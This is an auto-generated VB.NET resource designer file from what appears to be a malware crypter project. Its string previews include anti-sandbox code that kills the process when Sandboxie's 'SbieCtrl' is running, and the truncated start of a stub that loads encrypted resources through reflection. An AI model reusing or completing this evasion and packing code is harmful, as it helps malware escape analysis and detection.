'------------------------------------------------------------------------------
' <auto-generated>
'     This code was generated by a tool.
'     Runtime Version:4.0.30319.1
'
'     Changes to this file may cause incorrect behavior and will be lost if
'     the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------

Option Strict On
Option Explicit On

Imports System

Namespace My.Resources
    
    'This class was auto-generated by the StronglyTypedResourceBuilder
    'class via a tool like ResGen or Visual Studio.
    'To add or remove a member, edit your .ResX file then rerun ResGen
    'with the /str option, or rebuild your VS project.
    '''<summary>
    '''  A strongly-typed resource class, for looking up localized strings, etc.
    '''</summary>
    <Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0"),  _
     Global.System.Diagnostics.DebuggerNonUserCodeAttribute(),  _
     Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(),  _
     Global.Microsoft.VisualBasic.HideModuleNameAttribute()>  _
    Friend Module Resources
        
        Private resourceMan As Global.System.Resources.ResourceManager
        
        Private resourceCulture As Global.System.Globalization.CultureInfo
        
        '''<summary>
        '''  Returns the cached ResourceManager instance used by this class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
            Get
                If Object.ReferenceEquals(resourceMan, Nothing) Then
                    Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("WindowsApplication1.Resources", GetType(Resources).Assembly)
                    resourceMan = temp
                End If
                Return resourceMan
            End Get
        End Property
        
        '''<summary>
        '''  Overrides the current thread's CurrentUICulture property for all
        '''  resource lookups using this strongly typed resource class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend Property Culture() As Global.System.Globalization.CultureInfo
            Get
                Return resourceCulture
            End Get
            Set
                resourceCulture = value
            End Set
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to         Dim ProcList() As System.Diagnostics.Process
        '''        ProcList = System.Diagnostics.Process.GetProcesses()
        '''        For Each Proc As System.Diagnostics.Process In ProcList
        '''            If Proc.ToString.Contains(&quot;SbieCtrl&quot;) Then
        '''                System.Diagnostics.Process.GetCurrentProcess.Kill()
        '''            End If
        '''        Next.
        '''</summary>
        Friend ReadOnly Property antis() As String
            Get
                Return ResourceManager.GetString("antis", resourceCulture)
            End Get
        End Property
        
        Friend ReadOnly Property CrpMod() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("CrpMod", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .
        '''</summary>
        Friend ReadOnly Property junk() As String
            Get
                Return ResourceManager.GetString("junk", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Imports System, System.Reflection, System.Security.Cryptography, System.Resources, System.Text
        '''
        '''Module Module1
        '''    Dim repeater1, repeater2 As Byte()
        '''    Sub Main()
        '''        Try
        '''            Dim MyResMngr As ResourceManager = New ResourceManager(&quot;ChrmResFilerdr&quot;, Assembly.GetExecutingAssembly())
        '''            Dim MyResRdr1 As String = MyResMngr.GetString(&quot;ResFile1&quot;)
        '''            Dim MyresRdr2 As String = MyResMngr.GetString(&quot;ResFile2&quot;)
        '''            MyResMngr.ReleaseAllResources()
        '''            MethedCalle [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property Source() As String
            Get
                Return ResourceManager.GetString("Source", resourceCulture)
            End Get
        End Property
    End Module
End Namespace
